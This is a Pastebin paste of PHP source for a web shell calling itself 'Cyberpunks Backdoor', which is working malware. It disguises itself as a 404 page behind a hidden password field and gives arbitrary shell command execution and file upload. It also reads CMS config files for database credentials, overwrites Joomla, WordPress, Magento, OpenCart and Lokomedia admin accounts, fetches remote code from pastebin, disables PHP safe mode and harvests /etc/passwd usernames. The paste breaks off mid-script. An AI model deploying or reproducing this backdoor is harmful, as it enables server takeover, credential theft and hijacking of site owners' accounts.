API tools faq
paste
Guest User

Untitled

a guest
Jun 21st, 2018
58
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 45.78 KB | None | 0 0
raw download clone embed print report
  1.  
  2. $auth_pass = "323a9e52cbd97c3783cbeef2ba7d2e79"; // default: kimak
  3. $color = "#00ff00";
  4. $default_action = 'FilesMan';
  5. $default_use_ajax = true;
  6. $default_charset = 'UTF-8';
  7. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  8. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  9. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  10. header('HTTP/1.0 404 Not Found');
  11. exit;
  12. }
  13. }
  14.  
  15. function login_shell() {
  16. ?>
  17. <html>
  18. <head>
  19. <title>404 Not Found</title>
  20. <meta name='author' content='MRAF04'>
  21. <meta charset="UTF-8">
  22. <style type='text/css'>
  23. @import url(https://fonts.googleapis.com/css?family=Jolly +Lodger);
  24. html {
  25. background-color: white;
  26. min-height: 100%;
  27. background-repeat: no-repeat;
  28. background-attachment: fixed;
  29. background-position: center;
  30. background-size: cover;
  31. color: black;
  32. font-family: 'Jolly Lodger';
  33. font-size: 13px;
  34. width: 100%;
  35. padding: 0px;
  36. -moz-border-radius: 5px;
  37. -webkit-border-radius: 5px;
  38. border-radius: 5px;
  39. }
  40. li {
  41. display: inline;
  42. margin: 5px;
  43. padding: 5px;
  44. -moz-border-radius: 5px;
  45. -webkit-border-radius: 5px;
  46. border-radius: 5px;
  47. }
  48.  
  49.  
  50.  
  51. a {
  52. padding: 1px;
  53. border: 1px solid black;
  54. color: green;
  55. text-decoration:
  56. none;color: black;
  57. font-size:14px;
  58. }
  59.  
  60. a:hover {
  61. color: purple;
  62. text-decoration: underline;
  63. }
  64.  
  65. b {
  66. color: purple;
  67.  
  68. }
  69. input[type=text], input[type=password],input[type=submit] {
  70. background: white;
  71. overflow: hidden;
  72. color: black;
  73. border: 1px solid white;
  74. margin: 5px auto;
  75. padding-left: 5px;
  76. font-family: 'Ubuntu';
  77. font-size: 13px;
  78. -moz-border-radius: 5px;
  79. -webkit-border-radius: 5px;
  80. border-radius: 5px;
  81. position:relative;
  82. bottom:75px; left:300pt;
  83. }
  84.  
  85. </style>
  86. </head>
  87. <h1>404 Not Found</h1>
  88. <p>The requested URL was not found on this server.</p>
  89. <p>Additionally, a 404 Not Found
  90. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  91. <hr>
  92. <address>Apache/2.4.16 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Server at Port 80</address>
  93. </body>
  94. <center>
  95. <form method="post">
  96. <input type="password" name="pass">
  97. </form>
  98. <?php
  99. exit;
  100. }
  101. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  102. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  103. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  104. else
  105. login_shell();
  106. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  107. @ob_clean();
  108. $file = $_GET['file'];
  109. header('Content-Description: File Transfer');
  110. header('Content-Type: application/octet-stream');
  111. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  112. header('Expires: 0');
  113. header('Cache-Control: must-revalidate');
  114. header('Pragma: public');
  115. header('Content-Length: ' . filesize($file));
  116. readfile($file);
  117. exit;
  118. }
  119. ?>
  120. <html>
  121. <head>
  122. <title>Cyberpunks Backdoor</title>
  123. <meta name='author' content='MRAF04'>
  124. <meta charset="UTF-8">
  125. <style type='text/css'>
  126. @import url('http://fonts.googleapis.com/css?family=Jolly+Lodger');
  127. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  128. html {
  129. min-height: 100%;
  130. background-color: black;
  131. background-repeat: no-repeat;
  132. background-attachment: fixed;
  133. background-position: center;
  134. background-size: cover;
  135. color: white;
  136. font-family: 'Ubuntu';
  137. font-size: 13px;
  138. width: 100%;
  139. padding: 0px;
  140. -moz-border-radius: 5px;
  141. -webkit-border-radius: 5px;
  142. border-radius: 5px;
  143. }
  144. li {
  145. display: inline;
  146. margin: 5px;
  147. padding: 5px;
  148. -moz-border-radius: 5px;
  149. -webkit-border-radius: 5px;
  150. border-radius: 5px;
  151. }
  152. table, th, td {
  153. border-collapse:collapse;
  154. font-family: Tahoma, Geneva, sans-serif;
  155. background: transparent;
  156. font-family: 'Ubuntu';
  157. font-size: 13px;
  158. -moz-border-radius: 5px;
  159. -webkit-border-radius: 5px;
  160. border-radius: 5px;
  161. }
  162. .table_home, .th_home, .td_home {
  163. border: 1px solid #ffffff;
  164. -moz-border-radius: 5px;
  165. -webkit-border-radius: 5px;
  166. border-radius: 5px;
  167. }
  168. th {
  169. padding: 10px;
  170. }
  171. a {
  172. color: #ffffff;
  173. text-decoration: none;
  174. }
  175. b {
  176. padding: 1px;
  177. border: 1px solid white;
  178. color: green;
  179. text-decoration:
  180. none;color: white;
  181. font-size:14px;
  182. }
  183. a:hover {
  184. color: purple;
  185. text-decoration: underline;
  186. }
  187. tr:hover {
  188. background: #444;
  189. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  190. color: #FFFFFF; TEXT-DECORATION: none;
  191. }
  192.  
  193. input[type=text], input[type=password],input[type=submit] {
  194. background: transparent;
  195. overflow: hidden;
  196. color: #ffffff;
  197. border: 1px solid #ffffff;
  198. margin: 5px auto;
  199. padding-left: 5px;
  200. font-family: 'Ubuntu';
  201. font-size: 13px;
  202. -moz-border-radius: 5px;
  203. -webkit-border-radius: 5px;
  204. border-radius: 5px;
  205. }
  206. textarea {
  207. overflow: hidden;
  208. border: 1px solid #ffffff;
  209. width: 100%;
  210. height: 400px;
  211. padding-left: 5px;
  212. margin: 10px auto;
  213. resize: none;
  214. background: transparent;
  215. color: #ffffff;
  216. font-family: 'Ubuntu';
  217. font-size: 13px;
  218. -moz-border-radius: 5px;
  219. -webkit-border-radius: 5px;
  220. border-radius: 5px;
  221. }
  222. a:focus, input:focus, textarea:focus {
  223. outline: 0;
  224. border-color: rgba(82, 168, 236, 0.8);
  225. -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  226. -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  227. box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  228.  
  229. select {
  230. width: 152px;
  231. background: #000000;
  232. color: lime;
  233. border: 1px solid #ffffff;
  234. margin: 5px auto;
  235. padding-left: 5px;
  236. font-family: 'Ubuntu';
  237. font-size: 13px;
  238. -moz-border-radius: 5px;
  239. -webkit-border-radius: 5px;
  240. border-radius: 5px;
  241. }
  242. option:hover {
  243. background: lime;
  244. color: #000000;
  245. }
  246.  
  247. </style>
  248. </head>
  249. <?php
  250. function w($dir,$perm) {
  251. if(!is_writable($dir)) {
  252. return "<font color=red>".$perm."</font>";
  253. } else {
  254. return "<font color=lime>".$perm."</font>";
  255. }
  256. }
  257. function r($dir,$perm) {
  258. if(!is_readable($dir)) {
  259. return "<font color=red>".$perm."</font>";
  260. } else {
  261. return "<font color=lime>".$perm."</font>";
  262. }
  263. }
  264. function exe($cmd) {
  265. if(function_exists('system')) {
  266. @ob_start();
  267. @system($cmd);
  268. $buff = @ob_get_contents();
  269. @ob_end_clean();
  270. return $buff;
  271. } elseif(function_exists('exec')) {
  272. @exec($cmd,$results);
  273. $buff = "";
  274. foreach($results as $result) {
  275. $buff .= $result;
  276. } return $buff;
  277. } elseif(function_exists('passthru')) {
  278. @ob_start();
  279. @passthru($cmd);
  280. $buff = @ob_get_contents();
  281. @ob_end_clean();
  282. return $buff;
  283. } elseif(function_exists('shell_exec')) {
  284. $buff = @shell_exec($cmd);
  285. return $buff;
  286. }
  287. }
  288. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  289. $ar0=explode($marqueurDebutLien, $text);
  290. $ar1=explode($marqueurFinLien, $ar0[$i]);
  291. return trim($ar1[0]);
  292. }
  293. function perms($file){
  294. $perms = fileperms($file);
  295. if (($perms & 0xC000) == 0xC000) {
  296. // Socket
  297. $info = 's';
  298. } elseif (($perms & 0xA000) == 0xA000) {
  299. // Symbolic Link
  300. $info = 'l';
  301. } elseif (($perms & 0x8000) == 0x8000) {
  302. // Regular
  303. $info = '-';
  304. } elseif (($perms & 0x6000) == 0x6000) {
  305. // Block special
  306. $info = 'b';
  307. } elseif (($perms & 0x4000) == 0x4000) {
  308. // Directory
  309. $info = 'd';
  310. } elseif (($perms & 0x2000) == 0x2000) {
  311. // Character special
  312. $info = 'c';
  313. } elseif (($perms & 0x1000) == 0x1000) {
  314. // FIFO pipe
  315. $info = 'p';
  316. } else {
  317. // Unknown
  318. $info = 'u';
  319. }
  320. // Owner
  321. $info .= (($perms & 0x0100) ? 'r' : '-');
  322. $info .= (($perms & 0x0080) ? 'w' : '-');
  323. $info .= (($perms & 0x0040) ?
  324. (($perms & 0x0800) ? 's' : 'x' ) :
  325. (($perms & 0x0800) ? 'S' : '-'));
  326. // Group
  327. $info .= (($perms & 0x0020) ? 'r' : '-');
  328. $info .= (($perms & 0x0010) ? 'w' : '-');
  329. $info .= (($perms & 0x0008) ?
  330. (($perms & 0x0400) ? 's' : 'x' ) :
  331. (($perms & 0x0400) ? 'S' : '-'));
  332. // World
  333. $info .= (($perms & 0x0004) ? 'r' : '-');
  334. $info .= (($perms & 0x0002) ? 'w' : '-');
  335. $info .= (($perms & 0x0001) ?
  336. (($perms & 0x0200) ? 't' : 'x' ) :
  337. (($perms & 0x0200) ? 'T' : '-'));
  338. return $info;
  339. }
  340. function hdd($s) {
  341. if($s >= 1073741824)
  342. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  343. elseif($s >= 1048576)
  344. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  345. elseif($s >= 1024)
  346. return sprintf('%1.2f',$s / 1024 ) .' KB';
  347. else
  348. return $s .' B';
  349. }
  350. function findit($mytext,$starttag,$endtag) {
  351. $posLeft = stripos($mytext,$starttag)+strlen($starttag);
  352. $posRight = stripos($mytext,$endtag,$posLeft+1);
  353. return substr($mytext,$posLeft,$posRight-$posLeft);
  354. }
  355. function ambilKata($param, $kata1, $kata2){
  356. if(strpos($param, $kata1) === FALSE) return FALSE;
  357. if(strpos($param, $kata2) === FALSE) return FALSE;
  358. $start = strpos($param, $kata1) + strlen($kata1);
  359. $end = strpos($param, $kata2, $start);
  360. $return = substr($param, $start, $end - $start);
  361. return $return;
  362. }
  363. function getsource($url) {
  364. $curl = curl_init($url);
  365. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  366. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  367. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  368. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  369. $content = curl_exec($curl);
  370. curl_close($curl);
  371. return $content;
  372. }
  373. function bing($dork) {
  374. $npage = 1;
  375. $npages = 30000;
  376. $allLinks = array();
  377. $lll = array();
  378. while($npage <= $npages) {
  379. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  380. if($x) {
  381. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  382. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  383. $npage = $npage + 10;
  384. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  385. } else break;
  386. }
  387. $URLs = array();
  388. foreach($allLinks as $url){
  389. $exp = explode("/", $url);
  390. $URLs[] = $exp[2];
  391. }
  392. $array = array_filter($URLs);
  393. $array = array_unique($array);
  394. $sss = count(array_unique($array));
  395. foreach($array as $domain) {
  396. echo $domain."\n";
  397. }
  398. }
  399. function reverse($url) {
  400. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  401. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  402. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  403. curl_setopt($ch, CURLOPT_HEADER, 0);
  404. curl_setopt($ch, CURLOPT_POST, 1);
  405. $resp = curl_exec($ch);
  406. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  407. $array = explode(",,", $resp);
  408. unset($array[0]);
  409. foreach($array as $lnk) {
  410. $lnk = "http://$lnk";
  411. $lnk = str_replace(",", "", $lnk);
  412. echo $lnk."\n";
  413. ob_flush();
  414. flush();
  415. }
  416. curl_close($ch);
  417. }
  418. if(get_magic_quotes_gpc()) {
  419. function idx_ss($array) {
  420. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  421. }
  422. $_POST = idx_ss($_POST);
  423. $_COOKIE = idx_ss($_COOKIE);
  424. }
  425.  
  426. if(isset($_GET['dir'])) {
  427. $dir = $_GET['dir'];
  428. chdir($dir);
  429. } else {
  430. $dir = getcwd();
  431. }
  432. $kernel = php_uname();
  433. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  434. $dir = str_replace("\\","/",$dir);
  435. $scdir = explode("/", $dir);
  436. $freespace = hdd(disk_free_space("/"));
  437. $total = hdd(disk_total_space("/"));
  438. $used = $total - $freespace;
  439. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  440. $ds = @ini_get("disable_functions");
  441. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>MYSQL</font>" : "<font color=red>MYSQL</font>";
  442. $curl = (function_exists('curl_version')) ? "<font color=lime>CURL</font>" : "<font color=red>CURL</font>";
  443. $wget = (exe('wget --help')) ? "<font color=lime>WGET</font>" : "<font color=red>WGET</font>";
  444. $perl = (exe('perl --help')) ? "<font color=lime>PERL</font>" : "<font color=red>PERL</font>";
  445. $python = (exe('python --help')) ? "<font color=lime>PYTHON</font>" : "<font color=red>PYTHON</font>";
  446. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  447. if(!function_exists('posix_getegid')) {
  448. $user = @get_current_user();
  449. $uid = @getmyuid();
  450. $gid = @getmygid();
  451. $group = "?";
  452. } else {
  453. $uid = @posix_getpwuid(posix_geteuid());
  454. $gid = @posix_getgrgid(posix_getegid());
  455. $user = $uid['name'];
  456. $uid = $uid['uid'];
  457. $group = $gid['name'];
  458. $gid = $gid['gid'];
  459. }
  460. echo "<font color=lime>".$kernel."</font><br>";
  461. echo "Root@Cyberpunks:~";
  462. foreach($scdir as $c_dir => $cdir) {
  463. echo "<a href='?dir=";
  464. for($i = 0; $i <= $c_dir; $i++) {
  465. echo $scdir[$i];
  466. if($i != $c_dir) {
  467. echo "/";
  468. }
  469. }
  470. echo "'>$cdir</a>/";
  471. }
  472. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]<br>";
  473. echo "<center>";
  474. echo "<ul><font face='Jolly Lodger' size='9.9px'>";
  475. echo "<li><font color='red'>Cyberpunks</font> Backdoor</li>";
  476. echo "<center> </font> </font>";
  477. echo "<form method='post'>
  478. <font style='text-decoration: none;'> root@cyberpunks </font>
  479. <input type='text' size='20' height='10' name='cmd'><input type='submit' name='do_cmd' value='enter'>
  480. </form>";
  481. if($_POST['do_cmd']) {
  482. echo "<pre>".exe($_POST['cmd'])."</pre>";
  483. }
  484. if($_POST['upload']) {
  485. if($_POST['tipe_upload'] == 'biasa') {
  486. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  487. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  488. } else {
  489. $act = "<font color=red>failed to upload file</font>";
  490. }
  491. } else {
  492. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  493. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  494. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  495. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  496. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  497. } else {
  498. $act = "<font color=red>failed to upload file</font>";
  499. }
  500. } else {
  501. $act = "<font color=red>failed to upload file</font>";
  502. }
  503. }
  504. }
  505. echo "
  506. <form method='post' enctype='multipart/form-data'>
  507. <input type='radio' name='tipe_upload' value='biasa' checked> ".w($dir,"Current")."
  508. <input type='radio' name='tipe_upload' value='home_root'> ".w($_SERVER['DOCUMENT_ROOT'],"Home")."
  509. <input type='file' name='ix_file'>
  510. <input type='submit' value='upload' name='upload'>
  511. </form>";
  512. echo $act;
  513.  
  514.  
  515. echo "<hr>";
  516. echo "<center>";
  517. echo "<ul>";
  518. echo "<li> <a href='?'>Home&nbsp;</a> </li>";
  519. echo "<li> <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> </li>";
  520. echo "<li> <a href='?dir=$dir&do=tconf'>Config</a> </li>";
  521. echo "<li> <a href='?dir=$dir&do=aeu'>Auto Edit User</a> </li>";
  522. echo "<li> <a href='?dir=$dir&do=adminer'>Adminer</a> </li>";
  523. echo "<li> <a style='color: red;' href='?logout=true'>Logout</a> </li>";
  524. echo "</ul>";
  525. echo "</center>";
  526. echo "<hr>";
  527. if($_GET['logout'] == true) {
  528. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  529. echo "<script>window.location='?';</script>";
  530.  
  531. }
  532. elseif($_GET['do'] == 'aeu') {
  533. if($_POST['hajar']) {
  534. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  535. echo "username atau password harus lebih dari 6 karakter";
  536. } else {
  537. $user_baru = $_POST['user_baru'];
  538. $pass_baru = md5($_POST['pass_baru']);
  539. $conf = $_POST['config_dir'];
  540. $scan_conf = scandir($conf);
  541. foreach($scan_conf as $file_conf) {
  542. if(!is_file("$conf/$file_conf")) continue;
  543. $config = file_get_contents("$conf/$file_conf");
  544. if(preg_match("/JConfig|joomla/",$config)) {
  545. $dbhost = ambilkata($config,"host = '","'");
  546. $dbuser = ambilkata($config,"user = '","'");
  547. $dbpass = ambilkata($config,"password = '","'");
  548. $dbname = ambilkata($config,"db = '","'");
  549. $dbprefix = ambilkata($config,"dbprefix = '","'");
  550. $prefix = $dbprefix."users";
  551. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  552. $db = mysql_select_db($dbname);
  553. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  554. $result = mysql_fetch_array($q);
  555. $id = $result['id'];
  556. $site = ambilkata($config,"sitename = '","'");
  557. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  558. echo "Config => ".$file_conf."<br>";
  559. echo "CMS => Joomla<br>";
  560. if($site == '') {
  561. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  562. } else {
  563. echo "Sitename => $site<br>";
  564. }
  565. if(!$update OR !$conn OR !$db) {
  566. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  567. } else {
  568. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  569. }
  570. mysql_close($conn);
  571. } elseif(preg_match("/WordPress/",$config)) {
  572. $dbhost = ambilkata($config,"DB_HOST', '","'");
  573. $dbuser = ambilkata($config,"DB_USER', '","'");
  574. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  575. $dbname = ambilkata($config,"DB_NAME', '","'");
  576. $dbprefix = ambilkata($config,"table_prefix = '","'");
  577. $prefix = $dbprefix."users";
  578. $option = $dbprefix."options";
  579. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  580. $db = mysql_select_db($dbname);
  581. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  582. $result = mysql_fetch_array($q);
  583. $id = $result[ID];
  584. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  585. $result2 = mysql_fetch_array($q2);
  586. $target = $result2[option_value];
  587. if($target == '') {
  588. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  589. } else {
  590. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  591. }
  592. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  593. echo "Config => ".$file_conf."<br>";
  594. echo "CMS => Wordpress<br>";
  595. echo $url_target;
  596. if(!$update OR !$conn OR !$db) {
  597. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  598. } else {
  599. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  600. }
  601. mysql_close($conn);
  602. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  603. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  604. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  605. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  606. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  607. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  608. $prefix = $dbprefix."admin_user";
  609. $option = $dbprefix."core_config_data";
  610. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  611. $db = mysql_select_db($dbname);
  612. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  613. $result = mysql_fetch_array($q);
  614. $id = $result[user_id];
  615. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  616. $result2 = mysql_fetch_array($q2);
  617. $target = $result2[value];
  618. if($target == '') {
  619. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  620. } else {
  621. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  622. }
  623. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  624. echo "Config => ".$file_conf."<br>";
  625. echo "CMS => Magento<br>";
  626. echo $url_target;
  627. if(!$update OR !$conn OR !$db) {
  628. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  629. } else {
  630. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  631. }
  632. mysql_close($conn);
  633. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  634. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  635. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  636. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  637. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  638. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  639. $prefix = $dbprefix."user";
  640. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  641. $db = mysql_select_db($dbname);
  642. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  643. $result = mysql_fetch_array($q);
  644. $id = $result[user_id];
  645. $target = ambilkata($config,"HTTP_SERVER', '","'");
  646. if($target == '') {
  647. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  648. } else {
  649. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  650. }
  651. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  652. echo "Config => ".$file_conf."<br>";
  653. echo "CMS => OpenCart<br>";
  654. echo $url_target;
  655. if(!$update OR !$conn OR !$db) {
  656. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  657. } else {
  658. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  659. }
  660. mysql_close($conn);
  661. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  662. $dbhost = ambilkata($config,'server = "','"');
  663. $dbuser = ambilkata($config,'username = "','"');
  664. $dbpass = ambilkata($config,'password = "','"');
  665. $dbname = ambilkata($config,'database = "','"');
  666. $prefix = "users";
  667. $option = "identitas";
  668. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  669. $db = mysql_select_db($dbname);
  670. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  671. $result = mysql_fetch_array($q);
  672. $target = $result[alamat_website];
  673. if($target == '') {
  674. $target2 = $result[url];
  675. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  676. if($target2 == '') {
  677. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  678. } else {
  679. $cek_login3 = file_get_contents("$target2/adminweb/");
  680. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  681. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  682. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  683. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  684. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  685. } else {
  686. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  687. }
  688. }
  689. } else {
  690. $cek_login = file_get_contents("$target/adminweb/");
  691. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  692. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  693. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  694. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  695. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  696. } else {
  697. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  698. }
  699. }
  700. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  701. echo "Config => ".$file_conf."<br>";
  702. echo "CMS => Lokomedia<br>";
  703. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  704. echo $url_target2;
  705. } else {
  706. echo $url_target;
  707. }
  708. if(!$update OR !$conn OR !$db) {
  709. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  710. } else {
  711. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  712. }
  713. mysql_close($conn);
  714. }
  715. }
  716. }
  717. } else {
  718. echo "<center>
  719. <h1>Auto Edit User Config</h1>
  720. <form method='post'>
  721. DIR Config: <br>
  722. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  723. Set User & Pass: <br>
  724. <input type='text' name='user_baru' value='mraf04' placeholder='user_baru'><br>
  725. <input type='text' name='pass_baru' value='mraf04' placeholder='pass_baru'><br>
  726. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  727. </form>
  728. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  729. ";
  730. }
  731. }
  732. elseif($_GET['do'] == 'adminer') {
  733. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  734. function adminer($url, $isi) {
  735. $fp = fopen($isi, "w");
  736. $ch = curl_init();
  737. curl_setopt($ch, CURLOPT_URL, $url);
  738. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  739. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  740. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  741. curl_setopt($ch, CURLOPT_FILE, $fp);
  742. return curl_exec($ch);
  743. curl_close($ch);
  744. fclose($fp);
  745. ob_flush();
  746. flush();
  747. }
  748. if(file_exists('sql.php')) {
  749. echo "<center><font color=lime><a href='$full/sql.php' target='_blank'>adminer login</a></font></center>";
  750. } else {
  751. if(adminer("http://pastebin.com/raw/EzJmmzXt","sql.php")) {
  752. echo "<center><font color=lime><a href='$full/sql.php' target='_blank'>-> adminer login <-</a></font></center>";
  753. } else {
  754. echo "<center><font color=red>gagal buat file adminer</font></center>";
  755. }
  756. }
  757.  
  758. }
  759. elseif($_GET['do'] == 'entod') {
  760. echo "<center>";
  761. echo "<ul>";
  762. echo "<li> <a href='?dir=$dir&do=indi'>Config Grabber</a> </li>";
  763. echo "</ul>";
  764. echo "</center>";
  765. $byphp = "safe_mode = Off
  766. disable_functions = None
  767. ";
  768. file_put_contents("php.ini",$byphp);
  769.  
  770. echo '<CENTER><b>Config Grabber | MRAF04</b><br><br>';
  771. ?>
  772.  
  773. <bR><form method=post>
  774. <textarea style='width: 543px; height: 420px;' name=user><?php $users=file("/etc/passwd");
  775. foreach($users as $user)
  776. {
  777. $str=explode(":",$user);
  778. echo $str[0]."\n";
  779. }
  780.  
  781. ?></textarea><br>
  782. <input type=submit name=su value="Lets Start" /></form></CENTER>
  783. <center>
  784. <?php
  785. error_reporting(0);
  786. echo "<font color=#ff00 size=2 face=\"comic sans ms\">";
  787. if(isset($_POST['su']))
  788. {
  789. mkdir('lol',0777);
